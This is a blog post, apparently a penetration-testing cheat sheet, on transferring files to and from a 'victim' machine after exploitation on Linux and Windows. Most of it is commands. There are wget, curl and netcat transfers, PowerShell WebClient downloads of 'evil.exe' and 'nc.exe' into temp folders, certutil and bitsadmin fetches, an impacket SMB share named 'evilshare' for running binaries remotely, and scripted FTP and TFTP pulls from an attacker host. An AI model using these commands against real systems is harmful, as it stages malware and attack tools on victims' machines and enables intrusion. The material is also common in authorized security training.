File Transfer Methods in Linux & Windows- Yarsa DevBlog

File Transfer is one of the most crucial aspects of post-exploitation. You will need to move files, exploits, or tools between the victim's machine and your machine. You need to know various methods of transferring files depending on the OS and tools available on the system. Some of them are below:

ℹ️

This post assumes you are running Linux as a host machine.

Linux

HTTP

If the target machine has wget or curl installed, the easiest way to transfer files is through HTTP. You need to start an HTTP server on your host machine in the directory which contains the file you want to transfer.

# Setup http server in Host machine: 
## Python
python2 -m SimpleHTTPServer 8080
python3 -m http.server 8080

## php
php -s localhost:8080

## Apache
### For this, you need to copy the file you want to transfer to the directory '/var/www/html' then enable apache service
service apache2 start

Host Setup

Now you can download the files on the target machine as follows.

wget http://<your_hosts_ip>/<file_name>
curl http://<your_hosts_ip>/<file_name> > file
curl -O http://<your_hosts_ip>/<file_name>

Download Script

Netcat

If netcat is installed on the target machine, we can use it to transfer files.

# First, set up the netcat on target machine to listen for the incoming request.
nc -nvlp 8080 > file

# then send the desired file from your host machine
nc $target_ip 8080 < file

Netcat File Transfer

SCP

If you have SSH access to the target machine, you can transfer files using SCP as follows:

## Copy the file: 
scp /path/to/source/file.ext username@<target_ip>:/path/to/destination/file.ext

## Copy Directory:
scp -r /path/to/source/dir username@<target_ip>:/path/to/destination

SCP File Transfer

Windows

HTTP

Even though Windows doesn't have wget, we can use other options to download files via HTTP. Some of them are:

Powershell

powershell Invoke-WebRequest -Uri http://[vpnIP]:[LPORT2]/Message.exe -Outfile Message.exe

powershell -NoLogo -Command "$webClient = new-object System.Net.WebClient; $webClient.DownloadFile('http://192.168.189.131:7777/evil.exe', '%temp%\evil.exe');

powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.x/nc.exe','c:\temp\nc.exe')

powershell.exe -c (Start-BitsTransfer -Source "http://10.10.14.x/nc.exe -Destination C:\temp\nc.exe")

powershell.exe wget "http://10.10.14.x/nc.exe" -outfile "c:\temp\nc.exe"

Powershell File Transfer

Certutil

certutil.exe -urlcache -split -f http://<host_ip>:<port>/file file

Certutil File Transfer

Bitsadmin

bitsadmin /transfer evil /download /priority high http://<target_ip>:<port>/file %temp%\file

Bitsadmin File Transfer

SMB

The easiest method to transfer files between Linux and Windows is SMB since it doesn't require any special configuration or commands, and SMB is built-in on every Windows machine. You can also execute any binary on SMB without needing to copy it over the target machine.

First, start an smb share on your host machine.

python3 /usr/share/doc/python3-impacket/examples/smbserver.py evilshare .

💡

Your directory containing smbserver.py may defer from mine depending on your impacket installation.

You can test if the SMB share is up using net view command on windows.

net view \\<host_ip>

Now you can copy files from share to the target machine using copy or move and vice versa.

## In target machine download the file using copy
copy \\ip-addr\share-name\file out-file
  
## to transfer file from target machine to local machine
copy file_name \\ip-addr\share-name

SMB File Transfer

or you can execute the binary directly from the share without copying

\\<target_ip>\share-name\binary.exe

FTP

FTP is another method as handy as SMB as it's also built-in on Windows. However, it will only work if you have an interactive shell where you can use the FTP prompt to issue commands. If you don't have an interactive shell, you will need to create a file containing the command and feed it to FTP.

Install a python library called pyftpdlib.

sudo apt-get install python3-pyftpdlib

Start an FTP server with:

python3 -m pyftpdlib

# By default, the ftp server runs on port 2121 and accepts anonymous authentication
# you can specify the ports using -p argument
# you can also give write access to anonymous user with -w

FTP Server Setup

If you have an interactive shell, you can just log into the FTP server with ftp <host_ip> <port> and use the credentials anonymous. If you don't have an interactive shell, create a text file with the following content.

open <host_ip> <port>
anonymous
anonymous
binary # remove this line if the file you want to transfer is not binary
get binary_name.exe
bye

FTP Login

Now, simply run ftp -s:filename.txt , and it will download the file you specified.

TFTP

TFTP is similar to FTP, but it isn't installed natively on newer versions of Windows. If it is available (you can also enable it with pkgmgr /iu:"TFTP") on the target machine, you can start a TFTP server on your machine with:

service atftpd start

and get files from the target machine with:

tftp -i <host_ip> GET binary.exe

These are the most popular methods of post-exploit file transfer on Windows and Linux! Catch you in the next one.

File Transfer Methodologies

Aashish Tamang

Linux

HTTP

Netcat

SCP

Windows

HTTP

Powershell

Certutil

Bitsadmin

SMB

FTP

TFTP

Device Farming in the QA Process

Art Fundamentals: Shape Language in Character Design

Listeners in JMeter